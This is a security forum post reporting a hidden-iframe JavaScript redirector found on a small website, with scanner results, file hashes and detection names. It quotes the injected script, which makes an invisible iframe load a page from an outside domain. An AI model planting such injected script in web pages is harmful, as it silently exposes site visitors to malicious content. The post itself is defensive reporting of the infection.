« previous next »
Pages: [1]   Go Down

Author Topic: malicious iFrame malware on site...JS:Redirector-ZK [Trj]!  (Read 2695 times)

0 Members and 1 Guest are viewing this topic.

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33902
  • malware fighter
malicious iFrame malware on site...JS:Redirector-ZK [Trj]!
« on: January 28, 2015, 10:11:13 PM »
Suspicious iframes detected:
Object: htxp://cescon.ca/
SHA1: 8425cfe2e57f6c3a92573a4b3c14055fe5df7555
Name: TrojWare.JS.Iframe.PH
Object: htxp://paul.cescon.ca/home.php
SHA1: 26ffab28f8f0045bbe7d03dc52a76ec97a2427ff
Name: TrojWare.JS.Iframe.PHISSUE DETECTED   DEFINITION   INFECTED URL
Website Malware   mwjs-iframe-hidden1?v8   htxp://paul.cescon.ca/home.php
Internal Server Error   500-error?v1   htxp://paul.cescon.ca/guestbook.php (
Website Malware   mwjs-iframe-hidden1?v8   htxp://paul.cescon.ca/contact.html
Website Malware   MW:BLK:2   htxp://paul.cescon.ca/home.php ( View Payload )
Website Malware   mwjs-iframe-hidden1?v8   htxp://paul.cescon.ca/home.php
Known javascript malware. Details: http://labs.sucuri.net/db/malware/mwjs-iframe-hidden1?v8
<!-- <script>document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="htxp://gclabrelscon.net/about.php"></iframe></div>');</script></body>
Re: http://labs.sucuri.net/?details=gclabrelscon.net
Spam from IP: http://www.stopforumspam.com/ipcheck/198.27.105.242
Google Safebrowsing Blacklisted: http://www.google.com/safebrowsing/diagnostic?site=cescon.ca
Avast detects JS:Redirector-ZK [Trj]

polonus

Logged
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!
Pages: [1]   Go Up
« previous next »